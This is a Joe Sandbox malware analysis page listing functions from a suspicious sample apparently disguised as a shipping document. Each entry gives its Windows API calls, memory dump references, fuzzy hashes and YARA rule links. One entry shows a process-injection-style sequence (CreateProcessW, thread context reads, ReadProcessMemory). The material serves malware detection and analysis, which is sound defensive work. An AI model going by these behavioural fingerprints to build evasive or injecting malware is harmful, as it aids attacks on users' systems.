Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Name$Path$FileFullLongOpen
String ID: X
API String ID: 779396738-3081909835
Opcode ID: caab3bd3454a64ffceab4727e260973da3533c0c9a92e012da3a331267709e99
Instruction ID: 1ab09f44980d2fad4bc728e7f5bb21ee3dd9823663fc2927b1c584fa7d6d1756
Opcode Fuzzy Hash: caab3bd3454a64ffceab4727e260973da3533c0c9a92e012da3a331267709e99
Instruction Fuzzy Hash: 6921C371A002989FDB01DF94DC05BEE7BF9AF49714F00401AE804FB281DBB85A89DF61

Function 00F456C2 Relevance: 3.1, APIs: 2, Instructions: 77windowCOMMON

Download Yara Rule

APIs

Shell_NotifyIconW.SHELL32(00000000,?), ref: 00F45793

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: IconNotifyShell_
String ID:
API String ID: 1144537725-0
Opcode ID: 8218c8334d0ace726e7b1e12a93024b7e13a14389b57e15f2f3a436f485c74b7
Instruction ID: fec81547a7c12698c494187276334d1afbaaeeb487be73ee0e354982e4d05c7e
Opcode Fuzzy Hash: 8218c8334d0ace726e7b1e12a93024b7e13a14389b57e15f2f3a436f485c74b7
Instruction Fuzzy Hash: 2731A0B0905705CFD320EF34D884797BBE8FB49718F00092EEADA83241E779A944DB92

Function 00F470E5 Relevance: 3.1, APIs: 2, Instructions: 56fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00F4AE0C,?,00008000), ref: 00F47113
CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00F4AE0C,?,00008000), ref: 00F84BFF

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: e469ef88f2b57f3df97dbc863c5b70d2544a2bc643dca8a00513518fc56683cb
Instruction ID: 319e0d271a93b66548aa83bf490719b6c1b445133458cee211fe95626a54d98f
Opcode Fuzzy Hash: e469ef88f2b57f3df97dbc863c5b70d2544a2bc643dca8a00513518fc56683cb
Instruction Fuzzy Hash: E7019E31285325B6E3306A2ACC0EF977F98EF46770F148301BE986E1E0C7B45854EB90

Function 00F4368B Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00F436AD

Part of subcall function 00F43656: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00F4366B
Part of subcall function 00F43656: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00F43682

Part of subcall function 00F4445D: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00F436D8,?), ref: 00F4448D
Part of subcall function 00F4445D: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00F436D8,?), ref: 00F444A0
Part of subcall function 00F4445D: GetFullPathNameW.KERNEL32(00007FFF,?,?,01011418,01011400,?,?,?,?,?,?,00F436D8,?), ref: 00F44515
Part of subcall function 00F4445D: SetCurrentDirectoryW.KERNEL32(?,00000001,01011418,?,?,?,?,?,?,?,00F436D8,?), ref: 00F44596

SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00F436E7

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
String ID:
API String ID: 1550534281-0
Opcode ID: ae2537ae0c045db82b24179e3e8bb601376362129cf2d59a5298515283bb9927
Instruction ID: 2ad3b0f2fad729065df699b1f2c7920f8176fea21f1749382a290ae60731e765
Opcode Fuzzy Hash: ae2537ae0c045db82b24179e3e8bb601376362129cf2d59a5298515283bb9927
Instruction Fuzzy Hash: 0AF09A31504349AFE728ABB0FC0AB253B95A700B05F048502FA445A9DADBBFA050EB80

Function 00F4D010 Relevance: 2.1, APIs: 1, Instructions: 587COMMON

Download Yara Rule

APIs

__Init_thread_footer.LIBCMT ref: 00F4D44E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Init_thread_footer
String ID:
API String ID: 1385522511-0
Opcode ID: 54559ca5451136fbb687a677fc5fc3d04b43d44e7b2c31e1344ea8445e4dd8d1
Instruction ID: f8c83dd1507f8d0f1393322e2bd67605eb6fa13fe5bb09dec4611d188edfd33c
Opcode Fuzzy Hash: 54559ca5451136fbb687a677fc5fc3d04b43d44e7b2c31e1344ea8445e4dd8d1
Instruction Fuzzy Hash: B932BE75E042099FEF24CF54C884BBABBB5EF44324F248059ED45AB251DB78EE41EB90

Function 015A95E5 Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 015A9DA3
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 015A9E39
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 015A9E5B

Memory Dump Source

Source File: 00000000.00000002.1670471404.00000000015A8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015A8000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_15a8000_shipping doc_20241111.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction ID: 7068dd5a726b991f6bdf489116035989b75899eb9a7e2cd22d0358ad2d8dc1dd
Opcode Fuzzy Hash: 935c44ad8318b3af66d252774f477c9026677184fbf87e93bc0843909b837ee7
Instruction Fuzzy Hash: CB12CC24E24658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A5E77A4F81CB5A

Function 00F5FBF0 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00F5FC9F

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 908dbb43fe1d2bd520af88948d9ad7ea6e5d4394b299b02deec9ce516bf192f5
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: C431F271A001099BC708CF18D488A69FBA2FF49312B6486F5ED09CF655D731EEC9EB80

Function 00F4686D Relevance: 1.6, APIs: 1, Instructions: 65libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F46832: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F4687F,?,01011418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F4683E
Part of subcall function 00F46832: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00F46850
Part of subcall function 00F46832: FreeLibrary.KERNEL32(00000000,?,?,00F4687F,?,01011418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F46862

LoadLibraryExW.KERNEL32(?,00000000,00000002,?,01011418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F4689F

Part of subcall function 00F467FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00F8488B,?,01011418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F46804
Part of subcall function 00F467FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00F46816
Part of subcall function 00F467FB: FreeLibrary.KERNEL32(00000000,?,?,00F8488B,?,01011418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F46829

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: Library$Load$AddressFreeProc
String ID:
API String ID: 2632591731-0
Opcode ID: 55511d75d98a1c64c7724475c912a6ade67e8caa934e466201d6f893bcf247ae
Instruction ID: 2f19c3d7e9f12c3c9372fe12680b44ae0c9a3dce60c000e4522c9d4286d8c447
Opcode Fuzzy Hash: 55511d75d98a1c64c7724475c912a6ade67e8caa934e466201d6f893bcf247ae
Instruction Fuzzy Hash: E111E732640205AADB14BB74CC06FAD7FA59F45711F10842EF842E61C1EF789E09B762

Function 00F783A2 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 00F783E0

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 4c25134858a49779fcba59923580dfc97c92c79c497d89bbaf83c93eb16d388b
Instruction ID: 2c918366f44827bbf687488f4165e9c62fc4ca48d3c9dffa658efdbfdfe1153e
Opcode Fuzzy Hash: 4c25134858a49779fcba59923580dfc97c92c79c497d89bbaf83c93eb16d388b
Instruction Fuzzy Hash: A211487190410AAFCB05DF58E9449DA7BF4FF48310F10845AF808AB351DB31DA129BA5

Function 00F74F90 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00F74C0D: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F72DB9,00000001,00000364,?,00F5FD75,?,?,00F4B63D,00000000,?,?), ref: 00F74C4E

_free.LIBCMT ref: 00F74FFC

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: fe2375e0b059a0063ab653ef551284137b3b50292f0894cee7ac2f903fc38670
Instruction ID: 2e5786e8f41b8b7828e8fc6a2abb8db55bbf2b3040f9b5c2c70cc5155bb2504e
Opcode Fuzzy Hash: fe2375e0b059a0063ab653ef551284137b3b50292f0894cee7ac2f903fc38670
Instruction Fuzzy Hash: 860126726043056BE3218E659C45A9AFBE8EB89370F25461EE198832C0EB30B805DB65

Function 00F6E592 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b57b235cd232fbdcd3a3528690b4d16ba240885f741f3b82b206d8d3beab0f09
Instruction ID: 2beedfd6963e5a784af5792ccd7e5e8f57fa27cf8dbbd483194a4054d0745254
Opcode Fuzzy Hash: b57b235cd232fbdcd3a3528690b4d16ba240885f741f3b82b206d8d3beab0f09
Instruction Fuzzy Hash: 04F02D37A016209BD6313A65DC0575A32589F42338F184716F469D31D1EF78DC037A92

Function 00F4B606 Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00F4B610

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: _wcslen
String ID:
API String ID: 176396367-0
Opcode ID: c01671c16f3107d64e6e988da7e702dcc23d052180b1ca672188cdae017fdf76
Instruction ID: 07d6519c251ea2a5bc0876e81e3e2f039ce0ea873a243c6983e6f558e6699c34
Opcode Fuzzy Hash: c01671c16f3107d64e6e988da7e702dcc23d052180b1ca672188cdae017fdf76
Instruction Fuzzy Hash: 21F0A4B36007046ED7149F28DC06BA6BBA4EB44360F11812AFE19CB2D1DB35E5149BA0

Function 00F74C0D Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,00F72DB9,00000001,00000364,?,00F5FD75,?,?,00F4B63D,00000000,?,?), ref: 00F74C4E

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: bc1b92c61dfabfce0accdd6bd81ec6de07d61bd40b50632e3b6557d16b487e6a
Instruction ID: e8cb0e11d1f4823653bab6293fcd3bedb2a954bd4b0fb745604b0463ab4e1cac
Opcode Fuzzy Hash: bc1b92c61dfabfce0accdd6bd81ec6de07d61bd40b50632e3b6557d16b487e6a
Instruction Fuzzy Hash: D9F0B432A071246A9B236E669D05B5A7748AB417B0B19C017FD2D9B185CB35F800B6E2

Function 00F737B0 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00F5FD75,?,?,00F4B63D,00000000,?,?,?,00FB106C,00FDD0D0,?,00F8242E), ref: 00F737E2

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 87651c339ee63ba4d3583490d107f35dd53ee80502a6c6ab3c8059424758c0bf
Instruction ID: ab044ae977249e60ebbe3b430d5a47fe819ba99501b7eeae5fcd28391a2b245e
Opcode Fuzzy Hash: 87651c339ee63ba4d3583490d107f35dd53ee80502a6c6ab3c8059424758c0bf
Instruction Fuzzy Hash: F3E0E5F1A4922577D62526729C00F5A3748AB027B0F058123BC0DD68C1DB29DD02B2E2

Function 00F468DB Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,01011418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00F4690F

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9497b2e6207f9695c4bdfa4cb63a57abd461b9c68afb4835805038250ded4144
Instruction ID: 8b20718fd439e85995ec903b33bb448857868473ad880d1704c99b8c740403fb
Opcode Fuzzy Hash: 9497b2e6207f9695c4bdfa4cb63a57abd461b9c68afb4835805038250ded4144
Instruction Fuzzy Hash: 78F03071505712CFC7349F64D494812BBE4AF153253108A3EE5D6C2511C7729840EF41

Function 00FACC1D Relevance: 1.5, APIs: 1, Instructions: 26fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(?,?,?,00000000,00000000,?,?,?,?,00F8FA27,01003650,00000002), ref: 00FACC44

Part of subcall function 00FACB55: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,00000000,?,00000000,?,?,?,00FACC37,?,?,?), ref: 00FACB77
Part of subcall function 00FACB55: SetFilePointerEx.KERNEL32(?,?,00000000,00000000,00000001,?,00FACC37,?,?,?,?,00F8FA27,01003650,00000002), ref: 00FACB8C
Part of subcall function 00FACB55: SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,00FACC37,?,?,?,?,00F8FA27,01003650,00000002), ref: 00FACB98

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: File$Pointer$Write
String ID:
API String ID: 3847668363-0
Opcode ID: f70e54e45b1b15615bd5db6b21644cb347b99e4d8959d77adf252e747b66ff99
Instruction ID: 19b6bcba24e8e08eb07091a7ecf3ab10cfa0f66d0247d528af9947e8b935ee32
Opcode Fuzzy Hash: f70e54e45b1b15615bd5db6b21644cb347b99e4d8959d77adf252e747b66ff99
Instruction Fuzzy Hash: 5DE03976800718EFCB219F5ADC01C9AB7FDFF81261310852FE95682511D3B2AA04EBA0

Function 00F447D0 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00F447EF

Part of subcall function 00F484E7: _wcslen.LIBCMT ref: 00F484FA

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: LongNamePath_wcslen
String ID:
API String ID: 541455249-0
Opcode ID: 474f1f19350524cf73d510e740106079e96e6f9368911f1c6096d8ab3663d144
Instruction ID: 1f066cc0857d7e4c37c78f1451a5b4810ce7fe394fee163552679d73f52cb898
Opcode Fuzzy Hash: 474f1f19350524cf73d510e740106079e96e6f9368911f1c6096d8ab3663d144
Instruction Fuzzy Hash: A3E0CD7250012557CB20E298DC05FEA77DEDFC87D0F0501B1FC05D7254DD64AD81D690

Function 00F8033B Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNELBASE(00000000,00000000,?,00F806A5,?,?,00000000,?,00F806A5,00000000,0000000C), ref: 00F80358

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 13463fcd68615ce5733b766bba9b82e0691c1e002c285764b45270cad057c8f5
Instruction ID: 6455ad5c8e1f9e05a08a724c47af2d149001a7811f6eff808fb6ee5fd8f57987
Opcode Fuzzy Hash: 13463fcd68615ce5733b766bba9b82e0691c1e002c285764b45270cad057c8f5
Instruction Fuzzy Hash: 32D06C3204010DBBDF028F84DD06EDA3BAAFB48714F014000BE1856020C732E821EB90

Function 00FB7368 Relevance: 1.5, APIs: 1, Instructions: 220COMMON

Download Yara Rule

APIs

Part of subcall function 00F470E5: CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00F4AE0C,?,00008000), ref: 00F47113

GetLastError.KERNEL32(00000002,00000000), ref: 00FB75FC

Memory Dump Source

Source File: 00000000.00000002.1667478397.0000000000F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F40000, based on PE: true

Associated: 00000000.00000002.1667466031.0000000000F40000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000000FDC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667527175.0000000001002000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667564477.000000000100C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1667578127.0000000001014000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f40000_shipping doc_20241111.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: ff7648b3e464992342b05122fed55c8e40f2aec7f746fd1e84886fb907c40d1e
Instruction ID: 691fd845ac57e54ac65d990a63ed60bf2f68de79f57071d2105689deb8f3ddc4
Opcode Fuzzy Hash: ff7648b3e464992342b05122fed55c8e40f2aec7f746fd1e84886fb907c40d1e
Instruction Fuzzy Hash: C3816C306083019FCB15EF25C891BAABBE1AF89310F08456DF8955B292DB74ED45EF92

